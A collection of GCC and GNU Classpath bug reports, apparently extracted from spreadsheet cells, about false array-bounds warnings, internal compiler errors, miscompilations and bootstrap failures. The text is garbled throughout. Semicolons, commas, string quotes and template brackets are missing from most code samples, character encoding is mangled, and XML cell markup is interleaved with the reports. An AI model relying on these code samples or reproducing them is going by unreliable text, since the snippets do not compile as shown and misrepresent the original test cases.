Configured with: ../src/configure -v --with-pkgversion='Debian 4.3.2-1' --with-bugurl=file:///usr/share/doc/gcc-4.3/README.Bugs --enable-languages=cc++fortranobjcobj-c++ --prefix=/usr --enable-shared --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --enable-nls --with-gxx-include-dir=/usr/include/c++/4.3 --program-suffix=-4.3 --enable-clocale=gnu --enable-libstdcxx-debug --enable-objc-gc --enable-mpfr --enable-targets=all --enable-cld --enable-checking=release --build=i486-linux-gnu --host=i486-linux-gnu --target=i486-linux-gnu
Thread model: posix
gcc version 4.3.2 (Debian 4.3.2-1) 
Bug 37861 looks related but I'm not sure if the fix is the same if so this can be marked as a duplicate.
Here is the code (foo.c):
unsigned short foobar
int array[100]
void g(unsigned short j) {
  if (j &lt; 100)
    array[j]++
}
void f() {
  int i = foobar
  if (i &gt;= 100)
    g(foobar)
}
And here is the gcc call and output:
# gcc -O3 -Wall -c foo.c
foo.c: In function â€˜fâ€™:
foo.c:7: warning: array subscript is above array bounds
foo.c:7: warning: array subscript is above array bounds
Since j is unsigned and the array access only occurs for j &lt; 100 this can never be out of bounds. The warning message is also somewhat fragile e.g. it disappears with any of the following changes:
1. Declaring foobar as volatile.
2. Replacing if (i &gt;= 100) by if (foobar &gt;= 100)
3. Replacing either of the unsigned shorts by an int or short.
4. Removing the call to g.</t>
  </si>
  <si>
    <t>helmert</t>
  </si>
  <si>
    <t>GCC-58545</t>
  </si>
  <si>
    <t>[4.8 Regression] error: unable to find a register to spill in class 'POINTER_REGS'</t>
  </si>
  <si>
    <t>== C source ==
typedef unsigned char uint8_t
typedef unsigned int uint16_t
extern uint8_t f1 (const uint8_t*)
extern void f2 (uint8_t* uint8_t)
void func (uint16_t parameter uint8_t *addr uint8_t data)
{
   uint8_t status
   status = f1 (addr + 8)
   addr++
   if (*addr == parameter + 8)
      *addr = parameter
   f2 (addr data)
   f2 (addr + 8 status + 1)
}
== Command line ==
$ avr-gcc bug.c -S -Os -mmcu=atmega8
bug.c: In function 'func':
bug.c:20:1: error: unable to find a register to spill in class 'POINTER_REGS'
 }
 ^
bug.c:20:1: error: this is the insn:
(insn 37 15 16 2 (set (reg:QI 20 r20)
        (mem/c:QI (plus:HI (reg/f:HI 28 r28)
                (const_int 1 [0x1])) [3 S1 A8])) bug.c:15 70 {movqi_insn}
     (nil))
bug.c:20:1: internal compiler error: in spill_failure at reload1.c:2123
bug.c:20:1: internal compiler error: Segmentation fault
== configure == 
Configured with: ../../gcc.gnu.org/trunk/configure --target=avr --prefix=/local/gnu/install/gcc-4.8-mingw32 --host=i386-mingw32 --build=i686-linux-gnu --enable-languages=cc++ --disable-nls --disable-shared --with-dwarf2
== Notes ==
The compile passes with -fno-caller-saves</t>
  </si>
  <si>
    <t>gjl</t>
  </si>
  <si>
    <t>CLASSPATH-16983</t>
  </si>
  <si>
    <t>swing</t>
  </si>
  <si>
    <t>CLASSPATH</t>
  </si>
  <si>
    <t>ButtonGroups don't work</t>
  </si>
  <si>
    <t>Working on it.</t>
  </si>
  <si>
    <t>kho</t>
  </si>
  <si>
    <t>GCC-48795</t>
  </si>
  <si>
    <t>-Warray-bounds false positive</t>
  </si>
  <si>
    <t>$ gcc -v
Utilisation des specs internes.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-unknown-linux-gnu/4.6.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
ConfigurÃ© avec: /build/src/gcc-4.6-20110415/configure --prefix=/usr --libdir=/usr/lib --libexecdir=/usr/lib --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=https://bugs.archlinux.org/ --enable-languages=cc++adafortrangoltoobjcobj-c++ --enable-shared --enable-threads=posix --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-clocale=gnu --enable-gnu-unique-object --enable-linker-build-id --with-ppl --enable-cloog-backend=isl --enable-lto --enable-gold --enable-ld=default --enable-plugin --with-plugin-ld=ld.gold --enable-multilib --disable-libstdcxx-pch --enable-checking=release
ModÃ¨le de thread: posix
gcc version 4.6.0 20110415 (prerelease) (GCC)
$ cat t.c 
/* testcase (derived from wine) */
typedef struct
{
  int len
  char data[1]
} rec
int
p(rec *r int len)
int
f (char prm1 char prm2)
{
  char buf[10]
  rec *r1 = (rec *)
  r1-&gt;len = 10
  r1-&gt;data[0] = prm1
  r1-&gt;data[1] = prm2
  return p(r1 r1-&gt;len)
}
$ gcc -S -O2 -Wall t.c -save-temps
t.c: In function â€˜fâ€™:
t.c:19:11: attention : array subscript is above array bounds [-Warray-bounds]</t>
  </si>
  <si>
    <t>niko.lecam</t>
  </si>
  <si>
    <t>GCC-18308</t>
  </si>
  <si>
    <t>ICE in do_jump at dojump.c:274</t>
  </si>
  <si>
    <t>The following code snippet causes an ICE on mainline when compiled with
-O -ftree-vectorize -funroll-loops:
=============================
void foo()
void bar()
{
    int i j k=0
    for (i=0 i&lt;2 ++i)
        if (j) k=2
    if (k) foo()
}
=============================
bug.c: In function 'bar':
bug.c:4: internal compiler error: in do_jump at dojump.c:274
Please submit a full bug report [etc.]
Phil's regression hunter says:
: Search converges between 2004-10-01-014001-trunk (#570) and
2004-10-01-161002-trunk (#571).</t>
  </si>
  <si>
    <t>bonzini</t>
  </si>
  <si>
    <t>reichelt</t>
  </si>
  <si>
    <t>CLASSPATH-25976</t>
  </si>
  <si>
    <t>classpath</t>
  </si>
  <si>
    <t>Regex tokenizing</t>
  </si>
  <si>
    <t>Consider the following program:
package test
import java.util.regex.Matcher
import java.util.regex.Pattern
public class TokenizeTest {
    public static void main(String[] args) {
        String input = The cat sat on the mat
        int prevEnd = 0
        Matcher matcher = Pattern.compile([\\x20\\n\\r\\t]+).matcher(input)
        while (matcher.find()) {
            System.err.println(Match at  + matcher.start() + :  + input.substring(prevEnd matcher.start()))
            prevEnd = matcher.end()
        }
        System.err.println(Remainder:  + input.substring(prevEnd))
    }
}
With Sun JRE the output is:
Match at 3: The
Match at 7: cat
Match at 11: sat
Match at 14: on
Match at 18: the
Remainder: mat
With GNU Classpath it is:
Remainder: The cat sat on the mat
Michael Kay</t>
  </si>
  <si>
    <t>GCC-64045</t>
  </si>
  <si>
    <t>fortran.dg/pr45636.f90 fails for AArch64 - memcpy and memset are not combined</t>
  </si>
  <si>
    <t>In current trunk fortran.dg/pr45636.f90 fails for AArch64 as memcpy and memset are not combined.</t>
  </si>
  <si>
    <t>kugan</t>
  </si>
  <si>
    <t>GCC-9871</t>
  </si>
  <si>
    <t>Crash in __tcf_0 local cleanup called from __libc_start_main at end of program</t>
  </si>
  <si>
    <t>According to the C++ standard local objects that require dynamic initialization must be cleaned up. Here is an short example to show that this property is violated for local static objects declared in functions that appear in shared objects on Linux. The same example works properly on solaris 2.8 with the same GCC 3.2 compiler.
Reading specs from /dsw/gcc-3.2/lib/gcc-lib/i686-pc-linux-gnu/3.2/specs
Configured with: /tmp/gcc-3.2/configure --prefix=/dsw/gcc-3.2
Thread model: posix
gcc version 3.2
Reading specs from /dsw/gcc-3.2/lib/gcc-lib/sparc-sun-solaris2.8/3.2/specs
Configured with: ../configure --prefix=/dsw/gcc-3.2 --with-as=/usr/ccs/bin/as --with-ld=/usr/ccs/bin/ld --disable-nls --srcdir=/export/build/gcc-3.2
Thread model: posix
gcc version 3.2
It is not clear to me whether the bug is in the compiler itself or one of the runtime libraries or a combination of them.
Release:
GCC-3.2
Environment:
Linux gabizou.jpl.nasa.gov 2.4.18-10smp #1 SMP Wed Aug 7 11:17:48 EDT 2002 i686 unknown
How-To-Repeat:
The attachment has two source files and two log files:
app.cpp
m1.cpp
gcc-linux.log
gcc-sol2.log
Compile &amp; link app.cpp as an application: app
Compile &amp; link m1.cpp as a shared library: libm1.so
run:
./app _Z4foo2v
this will dlopen the libm1.so and call
extern const std::string&amp; foo2()
it has no objects that require dynamic initialization/finalization =&gt; ok
run:
./app _Z4foo1.v
this will call:
extern const std::string&amp; foo1()
{
  static const std::string me = foo1
  std::cout &lt;&lt; my name is: ' &lt;&lt; me &lt;&lt; ' &lt;&lt; std::endl
  return me
}
The crash turns out to be in the compiler-generated local cleanup function: __tcf_0
See 
gcc-linux.log for the run on linux 
gcc-sol2.log for the run on solaris 2.x
this will crash</t>
  </si>
  <si>
    <t>nicolas.rouquette</t>
  </si>
  <si>
    <t>GCC-21254</t>
  </si>
  <si>
    <t>[4.0 regression] Incorrect code with -funroll-loops for multiple targets with same code</t>
  </si>
  <si>
    <t>The following C++ when compiled with g++-4.0.0 produces incorrect code when 
compiled with -O1 -funroll-loops on both sparc-sun-solaris2.8 and i686-pc-linux-
gnu.  This is a bare-bones simplification of real code from an application using 
the Boost.Spirit library.  If compiled without -funroll-loops then the 
behaviour is as expected (no exception thrown see below).
$ /opt/gcc-4.0.0-cross/sparc-sun-solaris2.8/bin/sparc-sun-solaris2.8-g++ -v
Using built-in specs.
Target: sparc-sun-solaris2.8
Configured with: ../../gcc-4.0.0/configure --with-dwarf2 --enable-languages=c
c++ --enable-threads=no --disable-shared --prefix=/opt/gcc-4.0.0-cross/sparc-
sun-solaris2.8 --with-gnu-as --with-gnu-ld --disable-multilib --enable-concept-
checks --enable-clocale=generic --enable-libstdcxx-allocator=mt --build=i686-pc-
linux-gnu --host=i686-pc-linux-gnu --target=sparc-sun-solaris2.8 --with-
sysroot=/opt/sysroot/sparc-sun-solaris2.8/
Thread model: single
gcc version 4.0.0
$ /opt/gcc-4.0.0-cross/i686-pc-linux-gnu/bin/i686-pc-linux-gnu-g++ -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../../gcc-4.0.0/configure --with-dwarf2 --enable-languages=c
c++ --enable-threads=no --disable-shared --prefix=/opt/gcc-4.0.0-cross/i686-pc-
linux-gnu --with-gnu-as --with-gnu-ld --disable-multilib --enable-concept-checks 
--enable-clocale=generic --enable-libstdcxx-allocator=mt --build=i686-pc-linux-
gnu --host=i686-pc-linux-gnu --target=i686-pc-linux-gnu
Thread model: single
gcc version 4.0.0
The (poor but simple) C++ program is as follows:
// sparc-sun-solaris2.8-g++ -Wall -O1 -funroll-loops -o opt-sparc 
test_optimizer.cc
//
// or
//
// i686-pc-linux-gnu-g++ -Wall -O1 -funroll-loops -o opt-x86 test_optimizer.cc
#include 
#include 
class basic
{
public:
  void set(char from char to)
  {
    for (int i = from i &lt;= to ++i) {
      bset.set(static_cast(i))
    }
  }
private:
  std::bitset bset
}
// Nevermind that this is not robust code it's the simplest failure case.
void func(basic * const ptr
          const char *definition)
{
  char ch = *definition
  ++definition
  while (ch) {
    char next = *definition
    ++definition
    if (next == '-') {
      next = *definition
      ++definition
      ptr-&gt;set(ch next)
    }
    ch = next
  }
}
int
main(const int argc
     const char * const * const argv)
{
  basic ptr
  func(
}
This program should just set a couple of bits in the bitset and exit without any 
output.  However if compiled as described above it triggers bitset's throw of 
std::out_of_range:
$ ./opt-sparc 
terminate called after throwing an instance of 'std::out_of_range'
  what():  bitset::set
Abort
$ ./opt-x86 
terminate called after throwing an instance of 'std::out_of_range'
  what():  bitset::set
Aborted
The loop in func() has been simplified to remove all untaken branch pathways 
while still triggering the bug.
This appears to be a regression since gcc-3.4.3 (for both targets) has no 
trouble with this code.  Version info from those compilers is shown below.
$ /opt/gcc-3.4.3-cross/sparc-sun-solaris2.8/bin/sparc-sun-solaris2.8-g++ -v
Reading specs from /opt/gcc-3.4.3-cross/sparc-sun-solaris2.8/lib/gcc/sparc-sun-
solaris2.8/3.4.3/specs
Configured with: ../../gcc-3.4.3/configure --with-dwarf2 --enable-languages=c
c++ --enable-threads=no --disable-shared --prefix=/opt/gcc-3.4.3-cross/sparc-
sun-solaris2.8 --with-gnu-as --with-gnu-ld --disable-multilib --enable-concept-
checks --enable-clocale=generic --enable-libstdcxx-allocator=mt --build=i686-pc-
linux-gnu --host=i686-pc-linux-gnu --target=sparc-sun-solaris2.8 --with-
sysroot=/opt/sysroot/sparc-sun-solaris2.8/
Thread model: single
gcc version 3.4.3
$ /opt/gcc-3.4.3-cross/i686-pc-linux-gnu/bin/i686-pc-linux-gnu-g++ -v
Reading specs from /opt/gcc-3.4.3-cross/i686-pc-linux-gnu/lib/gcc/i686-pc-linux-
gnu/3.4.3/specs
Configured with: ../../gcc-3.4.3/configure --with-dwarf2 --enable-languages=c
c++ --enable-threads=no --disable-shared --prefix=/opt/gcc-3.4.3-cross/i686-pc-
linux-gnu --with-gnu-as --with-gnu-ld --disable-multilib --enable-concept-checks 
--enable-clocale=generic --enable-libstdcxx-allocator=mt --build=i686-pc-linux-
gnu --host=i686-pc-linux-gnu --target=i686-pc-linux-gnu
Thread model: single
gcc version 3.4.3</t>
  </si>
  <si>
    <t>rakdver</t>
  </si>
  <si>
    <t>spencer</t>
  </si>
  <si>
    <t>GCC-59269</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE with reference in union</t>
  </si>
  <si>
    <t>The following invalid code snippet (compiled with -std=c++11) triggers an ICE on trunk:
===================
union U
{
  int
}
void foo()
{
  U()
}
===================
bug.cc:3:12: error: 'U::i' may not have reference type 'int&amp;' because it is a member of a union
   int
            ^
bug.cc:3:12: error: invalid initialization of non-const reference of type 'int&amp;' from an rvalue of type 'int'
bug.cc: In function 'void foo()':
bug.cc:8:5: internal compiler error: in build_value_init_noctor at cp/init.c:385
   U()
     ^
0x6bccdf build_value_init_noctor(tree_node* int)
        ../../gcc/gcc/cp/init.c:385
0x6bce4c build_value_init(tree_node* int)
        ../../gcc/gcc/cp/init.c:364
0x606e6b build_functional_cast(tree_node* tree_node* int)
        ../../gcc/gcc/cp/typeck2.c:1858
0x66c0b5 cp_parser_functional_cast
        ../../gcc/gcc/cp/parser.c:23013
0x666930 cp_parser_postfix_expression
        ../../gcc/gcc/cp/parser.c:5821
0x669148 cp_parser_unary_expression
        ../../gcc/gcc/cp/parser.c:7109
0x669ddf cp_parser_binary_expression
        ../../gcc/gcc/cp/parser.c:7813
0x66a2d1 cp_parser_assignment_expression
        ../../gcc/gcc/cp/parser.c:8051
0x66c254 cp_parser_expression
        ../../gcc/gcc/cp/parser.c:8213
0x66ca8e cp_parser_expression
        ../../gcc/gcc/cp/parser.c:8252
0x66ca8e cp_parser_expression_statement
        ../../gcc/gcc/cp/parser.c:9551
0x6625e8 cp_parser_statement
        ../../gcc/gcc/cp/parser.c:9402
0x663399 cp_parser_statement_seq_opt
        ../../gcc/gcc/cp/parser.c:9674
0x66350e cp_parser_compound_statement
        ../../gcc/gcc/cp/parser.c:9628
0x676bdb cp_parser_function_body
        ../../gcc/gcc/cp/parser.c:18542
0x676bdb cp_parser_ctor_initializer_opt_and_function_body
        ../../gcc/gcc/cp/parser.c:18578
0x67aefe cp_parser_function_definition_after_declarator
        ../../gcc/gcc/cp/parser.c:22610
0x67bdbd cp_parser_function_definition_from_specifiers_and_declarator
        ../../gcc/gcc/cp/parser.c:22522
0x67bdbd cp_parser_init_declarator
        ../../gcc/gcc/cp/parser.c:16522
0x67d05f cp_parser_simple_declaration
        ../../gcc/gcc/cp/parser.c:11134
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-27494</t>
  </si>
  <si>
    <t>[4.1 regression] ICE on invalid template parameter</t>
  </si>
  <si>
    <t>The following invalid code snippet causes an ICE since GCC 3.4.0:
===================================
struct A
{
    template void foo() {}
    template void bar() {}
}
===================================
bug.cc:3: error: expected identifier before 'operator'
bug.cc:3: error: declaration of 'operator&gt;' as non-function
bug.cc:3: error: expected `&gt;' before 'void'
bug.cc:4: internal compiler error: tree check: accessed elt 1 of tree_vec with 0 elts in push_template_decl_real at cp/pt.c:3138
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>lmillward</t>
  </si>
  <si>
    <t>GCC-6475</t>
  </si>
  <si>
    <t>zlib miscompilation with gcc-3.1</t>
  </si>
  <si>
    <t>make test fails with a particular combination and only that combination so far of optimization flags.
CFLAGS=-O2 -frename-registers -fomit-frame-pointer -mcpu=pentiumpro -fPIC
Release:
3.1 20020425 (prerelease)
Environment:
i586-mandrake-linux-gnu
How-To-Repeat:
I am sorry but I don't have a testcase at this point.
1) Get zlib-1.1.4 sources
2) Configure as follows: CFLAGS=-O2 -frename-registers -fomit-frame-pointer -mcpu=pentiumpro -fPIC ./configure --shared
3) make make test</t>
  </si>
  <si>
    <t>jakub</t>
  </si>
  <si>
    <t>gbeauchesne</t>
  </si>
  <si>
    <t>GCC-44578</t>
  </si>
  <si>
    <t>GCC generates MMX instructions but fails to generate emms</t>
  </si>
  <si>
    <t>I'm using GCC to compile some code which uses SSE intrinsics. The code is being compiled at -O3 -mfpmath=sse.
GCC decides to use MMX instructions for some of the operations (zeroing some memory). There are no MMX intrinsics in the source but an SSE _mm_setzero_ps gets compiled into a pair of movq %mm0.
No emms instruction is emitted possibly because gcc knows the FPU is not in use because of the -mfpmath=sse switch leaving the FPU in MMX mode.
However the platform ABI specifies floating-point return values be returned in FPU registers so gcc moves return values from SSE registers to the FPU for argument passing/returning. Since the FPU is in an invalid state because of the lack of emms this corrupts the floating-point values.
This behaviour seems to be very dependent on the exact version of gcc and the exact source.
Here's a testcase:
#include 
#include 
// Since this is all in one file we need to mark some functions
// noinline so that the interesting parts don't get compiled away
#define NOINLINE __attribute__((noinline))
struct OutputData
{
  __m128 a b
}
struct InputData
{
  float a b
}
// Something that uses an OutputData that won't be compiled away
__m128 ga gb
NOINLINE void doSomethingWith(const OutputData&amp; d){
  ga = d.a
  gb = d.b
}
NOINLINE void calc(const InputData&amp; in)
{
  OutputData out
  // the next two lines are where the bug manifests
  // gcc decides to use MMX instructions to write
  // some zeros but fails to clean up afterwards.
  out.a = _mm_setr_ps(in.a in.b 0 0)
  out.b = _mm_setzero_ps()
  // ensure the above is not optimised away
  doSomethingWith(out)
}
NOINLINE float retFloat()
{
  return 3
}
int main()
{
  InputData x = {3.4 42}
  // GCC emits MMX instructions for this function but emits no emms
  calc(x)
  // This uses the FPU to return the value which gets corrupted
  printf(%f\n retFloat())
  return 0
}
On my machine this generates (for the function calc):
.globl _Z4calcRK9InputData
        .type   _Z4calcRK9InputData @function
_Z4calcRK9InputData:
.LFB530:
        .cfi_startproc
        .cfi_personality 0x0__gxx_personality_v0
        pushl   %ebp
        .cfi_def_cfa_offset 8
        pxor    %mm0 %mm0
        movl    %esp %ebp
        .cfi_offset 5 -8
        .cfi_def_cfa_register 5
        subl    $60 %esp
        movl    8(%ebp) %eax
        movss   4(%eax) %xmm0
        movss   (%eax) %xmm1
        movq    %mm0 -48(%ebp)  MMX instruction
        movq    %mm0 -24(%ebp)  MMX instruction
        leal    -40(%ebp) %eax
        movq    %mm0 -16(%ebp)  MMX instruction
        movl    %eax (%esp)
        unpcklps        %xmm0 %xmm1
        movaps  %xmm1 %xmm0
        xorps   %xmm1 %xmm1
        movlhps %xmm1 %xmm0
        movlps  %xmm0 -40(%ebp)
        movhps  %xmm0 -32(%ebp)
        call    _Z15doSomethingWithRK10OutputData
        leave
        ret  FPU stack still in MMX mode and unusable for floating point
        .cfi_endproc
.LFE530:
        .size   _Z4calcRK9InputData .-_Z4calcRK9InputData
System:
Ubuntu Lucid (gcc 4:4.4.3-1ubuntu1)
GCC:
Using built-in specs.
Target: i486-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu 4.4.3-4ubuntu5' --with-bugurl=file:///usr/share/doc/gcc-4.4/README.Bugs --enable-languages=cc++fortranobjcobj-c++ --prefix=/usr --enable-shared --enable-multiarch --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.4 --program-suffix=-4.4 --enable-nls --enable-clocale=gnu --enable-libstdcxx-debug --enable-plugin --enable-objc-gc --enable-targets=all --disable-werror --with-arch-32=i486 --with-tune=generic --enable-checking=release --build=i486-linux-gnu --host=i486-linux-gnu --target=i486-linux-gnu
Thread model: posix
gcc version 4.4.3 (Ubuntu 4.4.3-4ubuntu5)</t>
  </si>
  <si>
    <t>ubizjak</t>
  </si>
  <si>
    <t>stephen.dolan</t>
  </si>
  <si>
    <t>GCC-2464</t>
  </si>
  <si>
    <t>Template pointer parameter specialization of member functions</t>
  </si>
  <si>
    <t>If a specialize a template class to accept pointers 
and eventually instanciate that class with pointers to members 
I will run into problems:
testpartialtemplate.cpp: In function `int main()':
testpartialtemplate.cpp:24: no matching function for call to `C::foo ()'
testpartialtemplate.cpp:10: candidates are: void C::foo()
Release:
gcc version 2.95.3 20010101 (prerelease)
Environment:
Debian Woody on i386</t>
  </si>
  <si>
    <t>philippeb</t>
  </si>
  <si>
    <t>GCC-65865</t>
  </si>
  <si>
    <t>bootstrap</t>
  </si>
  <si>
    <t>[6 Regression] Bootstrap failure on x86</t>
  </si>
  <si>
    <t>On Linux/x86 r222380 gave
libtool: compile:  /export/build/gnu/gcc/build-x86_64-linux/./gcc/xgcc -shared-libgcc -B/export/build/gnu/gcc/build-x86_64-linux/./gcc -nostdinc++ -L/export/build/gnu/gcc/build-x86_64-linux/x86_64-unknown-linux-gnu/32/libstdc++-v3/src -L/export/build/gnu/gcc/build-x86_64-linux/x86_64-unknown-linux-gnu/32/libstdc++-v3/src/.libs -L/export/build/gnu/gcc/build-x86_64-linux/x86_64-unknown-linux-gnu/32/libstdc++-v3/libsupc++/.libs -B/usr/gcc-6.0.0/x86_64-unknown-linux-gnu/bin/ -B/usr/gcc-6.0.0/x86_64-unknown-linux-gnu/lib/ -isystem /usr/gcc-6.0.0/x86_64-unknown-linux-gnu/include -isystem /usr/gcc-6.0.0/x86_64-unknown-linux-gnu/sys-include -m32 -D_GNU_SOURCE -D_DEBUG -D__STDC_CONSTANT_MACROS -D__STDC_FORMAT_MACROS -D__STDC_LIMIT_MACROS -DHAVE_RPC_XDR_H=1 -DHAVE_TIRPC_RPC_XDR_H=0 -I. -I/export/gnu/import/git/sources/gcc/libsanitizer/sanitizer_common -I.. -I /export/gnu/import/git/sources/gcc/libsanitizer/include -isystem /export/gnu/import/git/sources/gcc/libsanitizer/include/system -Wall -W -Wno-unused-parameter -Wwrite-strings -pedantic -Wno-long-long -fPIC -fno-builtin -fno-exceptions -fno-rtti -fomit-frame-pointer -funwind-tables -fvisibility=hidden -Wno-variadic-macros -I../../libstdc++-v3/include -I../../libstdc++-v3/include/x86_64-unknown-linux-gnu -I/export/gnu/import/git/sources/gcc/libsanitizer/../libstdc++-v3/libsupc++ -std=gnu++11 -DSANITIZER_LIBBACKTRACE -DSANITIZER_CP_DEMANGLE -I /export/gnu/import/git/sources/gcc/libsanitizer/../libbacktrace -I ../libbacktrace -I /export/gnu/import/git/sources/gcc/libsanitizer/../include -include /export/gnu/import/git/sources/gcc/libsanitizer/libbacktrace/backtrace-rename.h -O2 -g -D_GNU_SOURCE -m32 -MT sanitizer_linux_libcdep.lo -MD -MP -MF .deps/sanitizer_linux_libcdep.Tpo -c /export/gnu/import/git/sources/gcc/libsanitizer/sanitizer_common/sanitizer_linux_libcdep.cc  -fPIC -DPIC -o .libs/sanitizer_linux_libcdep.o
/export/gnu/import/git/sources/gcc/libsanitizer/sanitizer_common/sanitizer_linux_libcdep.cc: In function â€˜void __sanitizer::InitTlsSize()â€™:
/export/gnu/import/git/sources/gcc/libsanitizer/sanitizer_common/sanitizer_linux_libcdep.cc:173:29: error: invalid conversion from â€˜get_tls_func {aka void (__attribute__((stdcall regparm(3))) *)(unsigned int* unsigned int*)}â€™ to â€˜void (*)(unsigned int* unsigned int*)â€™ [-fpermissive]
   IndirectExternCall(get_tls)(
                             ^
In file included from /export/gnu/import/git/sources/gcc/libsanitizer/sanitizer_common/sanitizer_linux_libcdep.cc:16:0:
/export/gnu/import/git/sources/gcc/libsanitizer/sanitizer_common/sanitizer_common.h:529:3: note:   initializing argument 1 of â€˜F __sanitizer::IndirectExternCall(F) [with F = void (*)(unsigned int* unsigned int*)]â€™
 F IndirectExternCall(F f) {
   ^
make[8]: *** [sanitizer_linux_libcdep.lo] Error 1</t>
  </si>
  <si>
    <t>hjl.tools</t>
  </si>
  <si>
    <t>GCC-51974</t>
  </si>
  <si>
    <t>[4.7 Regression] GCC fails to bootstrap with --enable-checking=release on opensuse</t>
  </si>
  <si>
    <t>I tried to build the latest trunk (183442) with --enable-checking=release on the Opensuse 12.1 x86_64 host. Checking between stage2 and stage3 fails. 
Bootstrap comparison failure!
gcc/tree-ssa-dom.o differs
gcc/tree-ssa-structalias.o differs
gcc/final.o differs
gcc/combine.o differs
gcc/reload1.o differs
gcc/tree-ssa-ccp.o differs
gcc/tree-ssa.o differs
This version passes on Fedora Core 15 x86_64. Anyone seen this? I am seeing the following differences:
reload1.o:stage2
    30b4:	0f 1f 40 00          	nopl   0x0(%rax)
    30b8:	41 8b 57 08          	mov    0x8(%r15)%edx
    30bc:	83 c2 7d             	add    $0x7d%edx
    30bf:	e9 7c fe ff ff       	jmpq   2f40 
    b0d4:	0f 1f 40 00          	nopl   0x0(%rax)
    b0d8:	48 63 f6             	movslq %esi%rsi
    b0db:	48 29 70 18          	sub    %rsi0x18(%rax)
    b0df:	e9 3c fe ff ff       	jmpq   af20 
reload1.o:stage3
    30c8:	41 8b 57 08          	mov    0x8(%r15)%edx
    30cc:	83 c2 7d             	add    $0x7d%edx
    30cf:	e9 7c fe ff ff       	jmpq   2f50 
    30d4:	0f 1f 40 00          	nopl   0x0(%rax)
    b0e8:	48 63 f6             	movslq %esi%rsi
    b0eb:	48 29 70 18          	sub    %rsi0x18(%rax)
    b0ef:	e9 3c fe ff ff       	jmpq   af30 
    b0f4:	0f 1f 40 00          	nopl   0x0(%rax)</t>
  </si>
  <si>
    <t>nenad</t>
  </si>
  <si>
    <t>GCC-4999</t>
  </si>
  <si>
    <t>asm code with concatenated content fails in template class member functions</t>
  </si>
  <si>
    <t>It appears that using literal string concatenation within asm code can cause corruption of the assembly generated by gcc - it contains random junk (including characters with the high bit set) rather than the assembly and gas gives up.  Note that literal string concatenation within asm code is used extensively by libmmx:
  http://min.ecn.purdue.edu/~rfisher/Research/Libmmx/libmmx.html
Here's a chunk of code that demonstrates the problem:
  template  struct test {
    static int foo(int *b1 int *b2) {
      __asm__ (movq  %0 %% mm2 : : m (*(long long *)b1)) 
      __asm__ (movq  % mm2  % mm3)   
      __asm__ (punpckhbw  % mm0  % mm2)   
      __asm__ (punpckhbw  % mm0  % mm3)   
      __asm__ (movq  %0 %% mm4 : : m (*(long long *)b2)) 
      __asm__ (movq  % mm4  % mm5)   
      __asm__ (punpckhbw  % mm0  % mm4)   
      __asm__ (punpckhbw  % mm0  % mm5)   
      __asm__ (psubsw  % mm4  % mm2)   
      __asm__ (psubsw  % mm5  % mm3)   
      __asm__ (pmaddwd  % mm2  % mm2)   
      __asm__ (pmaddwd  % mm3  % mm3)   
      __asm__ (paddd  % mm2  % mm1)   
      __asm__ (paddd  % mm3  % mm1)   
    }
  } 
  int main(int argc) {
    test::foo(
  }
Here's what happens when attempting to compile it for me:
  % g++ -v --save-temps bug1.cc
  Reading specs from /usr/lib/gcc-lib/i386-linux/2.95.4/specs
  gcc version 2.95.4 20011006 (Debian prerelease)
   /usr/lib/gcc-lib/i386-linux/2.95.4/cpp0 -lang-c++ -v -D__GNUC__=2 -D__GNUG__=2 -D__GNUC_MINOR__=95 -D__cplusplus -D__ELF__ -Dunix -D__i386__ -Dlinux -D__ELF__ -D__unix__ -D__i386__ -D__linux__ -D__unix -D__linux -Asystem(posix) -D__EXCEPTIONS -Acpu(i386) -Amachine(i386) -Di386 -D__i386 -D__i386__ bug1.cc bug1.ii
  GNU CPP version 2.95.4 20011006 (Debian prerelease) (i386 Linux/ELF)
  #include ... search starts here:
  #include  search starts here:
   /usr/lib/gcc-lib/i386-linux/2.95.4/../../../../include/g++-3
   /usr/local/include
   /usr/lib/gcc-lib/i386-linux/2.95.4/include
   /usr/include
  End of search list.
  The following default directories have been omitted from the search path:
   /usr/lib/gcc-lib/i386-linux/2.95.4/../../../../i386-linux/include
  End of omitted list.
   /usr/lib/gcc-lib/i386-linux/2.95.4/cc1plus bug1.ii -quiet -dumpbase bug1.cc -version -o bug1.s
  GNU C++ version 2.95.4 20011006 (Debian prerelease) (i386-linux) compiled by GNU C version 2.95.4 20011006 (Debian prerelease).
   as -V -Qy -o bug1.o bug1.s
  GNU assembler version 2.11.92.0.10 (i386-linux) using BFD version 2.11.92.0.10 20011021 Debian/GNU Linux
  bug1.s: Assembler messages:
  bug1.s:46: Error: invalid character (0xffffffe7) in mnemonic
  bug1.s:47: Error: invalid character (0xffffffa0) in mnemonic
  bug1.s:48: Warning: rest of line ignored first ignored character valued 0xb
  bug1.s:49: Warning: rest of line ignored first ignored character is `6'
  bug1.s:50: Error: invalid character '.' in mnemonic
  bug1.s:57: Error: invalid character '&gt;' in mnemonic
I've attached an archive with the intermediate .s file which contains such exciting lines of assembly as pÃ§8Ã§&amp; e.t.foo__t4test1ZiPiT1 and int&gt;::foo(int * int *).  Clearly there's some random memory corruption going on.
See also bug report titled volatile asm code fails in template class member functions.
Release:
2.95.4
Environment:
Debian unstable (sid) i386 Linux 2.2.17</t>
  </si>
  <si>
    <t>sethml</t>
  </si>
  <si>
    <t>GCC-3158</t>
  </si>
  <si>
    <t>methods are wrongly implemented private in slice_array</t>
  </si>
  <si>
    <t>According to Stroustrups book slice_array assignment operator should be public but it is implemented private which makes legal code be rejected.
Output:
/usr/include/g++/std/slice_array.h:92: `class slice_array &amp; slice_array::operator
=(const slice_array &amp;)' is private
simple3.cc:21: within this context
Release:
Reading specs from /usr/lib/gcc-lib/i486-suse-linux/2.95.2/specsgcc version 2.95.2 19991024 (release)
Environment:
AMD Athlon KLinux 2.2.16
How-To-Repeat:
